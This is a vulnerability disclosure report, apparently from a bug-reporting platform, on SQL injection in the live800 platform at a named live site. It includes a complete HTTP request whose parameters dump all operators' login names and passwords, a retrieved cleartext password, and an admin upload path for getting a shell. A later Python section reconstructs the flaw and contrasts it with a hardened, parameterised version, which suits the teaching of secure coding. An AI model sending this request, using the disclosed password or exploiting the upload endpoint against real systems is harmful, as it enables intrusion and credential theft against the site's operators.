### Brief description:

RT (as in the title)

### Detailed description:

Vulnerable site: online.kingdee.com. The live800 platform has a SQL injection vulnerability.

```
POST //live800/sta/export/referrerSta.jsp HTTP/1.1
Host: online.kingdee.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1439863446; Hm_lvt_329734d1d305dcdeae1b8e0ceccc6b2b=1439865398
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-04-18&toTime=2016-04-19&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator)
```

Two parameters are injectable here. `companyId` sits in a numeric context, so `1 or 1=1` needs no quote to break out of the statement, and `subStrSql` is spliced into the query as a raw SQL fragment, so a subselect against the `operator` table writes every operator's login name and password into the exported CSV.

![1.png](https://images.seebug.org/upload/201604/19175250c603119939b549beb9a14eccfaf3d66d.png)

The password retrieved is: 123qweasd (the value comes straight out of the `password` column, so credentials appear to be stored in cleartext).

The admin backend does not restrict file uploads, so a shell can be obtained (getshell) by uploading through: /live800/addOperatorUtil.jsp?action=1

### Proof of vulnerability:

The request, screenshot and retrieved credentials are those shown in the detailed description above.
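The request above shows the symptom but not the query that produces it. The following is an added example, not live800's code or anything from the original report: a hypothetical reconstruction in Python with SQLite of a referrer-statistics export that splices `companyId` and `subStrSql` into its SQL, beside a hardened version that binds the company id as an integer parameter and only accepts an allowlisted name for any extra column. Table and column names (`referrer_sta`, `operator`, `login_name`, `password`) and the sample rows are assumptions; the `subStrSql` payload is rewritten for SQLite's `||` operator because MySQL's three-argument `group_concat(login_name,0x3a,password)` has no direct SQLite equivalent.

```python
import sqlite3

# Constructed sample data (not from the target system): two companies, two
# operators, a handful of referrer rows.
SAMPLE_SCHEMA = """
CREATE TABLE operator (id INTEGER, company_id INTEGER, login_name TEXT, password TEXT);
INSERT INTO operator VALUES (1, 1, 'admin', 'secret1'), (2, 2, 'agent', 'secret2');
CREATE TABLE referrer_sta (company_id INTEGER, day TEXT, referrer TEXT, visits INTEGER);
INSERT INTO referrer_sta VALUES
  (1, '2016-04-18', 'search-engine', 10),
  (1, '2016-04-19', 'direct', 4),
  (2, '2016-04-18', 'partner-site', 7);
"""


def make_db():
    """In-memory SQLite database filled with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def export_vulnerable(conn, company_id, from_time, to_time, sub_str_sql=""):
    """Hypothetical vulnerable export: request parameters concatenated into SQL.

    company_id lands in a numeric context (no quote needed to break out) and
    sub_str_sql is accepted as a raw SQL fragment chosen by the client.
    """
    extra = f", {sub_str_sql} AS extra" if sub_str_sql else ""
    sql = (
        f"SELECT referrer, SUM(visits){extra} FROM referrer_sta "
        f"WHERE company_id = {company_id} "
        f"AND day BETWEEN '{from_time}' AND '{to_time}' "
        f"GROUP BY referrer ORDER BY referrer"
    )
    return conn.execute(sql).fetchall()


# Hardened variant: the client picks a key from this allowlist, never an SQL
# fragment, and the expression behind the key is fixed server-side.
ALLOWED_EXTRA_COLUMNS = {
    "days": "COUNT(DISTINCT day)",
    "max_visits": "MAX(visits)",
}


def export_safe(conn, company_id, from_time, to_time, extra_column=None):
    """Same report with integer validation, bound parameters and an allowlist."""
    try:
        cid = int(company_id)  # '1 or 1=1' raises ValueError here
    except (TypeError, ValueError):
        raise ValueError("companyId must be an integer")
    extra = ""
    if extra_column is not None:
        if extra_column not in ALLOWED_EXTRA_COLUMNS:
            raise ValueError("unknown extra column")
        extra = f", {ALLOWED_EXTRA_COLUMNS[extra_column]} AS extra"
    sql = (
        f"SELECT referrer, SUM(visits){extra} FROM referrer_sta "
        "WHERE company_id = ? AND day BETWEEN ? AND ? "
        "GROUP BY referrer ORDER BY referrer"
    )
    return conn.execute(sql, (cid, from_time, to_time)).fetchall()


def is_rejected(conn, company_id, extra_column=None):
    """True when the hardened export refuses the supplied parameters."""
    try:
        export_safe(conn, company_id, "2016-04-18", "2016-04-19", extra_column)
    except ValueError:
        return True
    return False


# The two payloads from the request above, adapted to SQLite syntax.
INJECTED_COMPANY_ID = "1 or 1=1"
INJECTED_SUB_STR_SQL = "(select group_concat(login_name || ':' || password) from operator)"


def demo():
    """Runs the injected request against the vulnerable export; every returned
    row carries all operators' credentials in its third column."""
    conn = make_db()
    return export_vulnerable(conn, INJECTED_COMPANY_ID, "2016-04-18",
                             "2016-04-19", INJECTED_SUB_STR_SQL)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

With the injected parameters the vulnerable query becomes `... WHERE company_id = 1 or 1=1 AND day BETWEEN ...`, which `OR` precedence turns into "every company", and the scalar subselect in `subStrSql` is evaluated once per output row, so the CSV leaks the whole `operator` table. The hardened version fails closed on both payloads and still supports the extra-column feature through a fixed mapping.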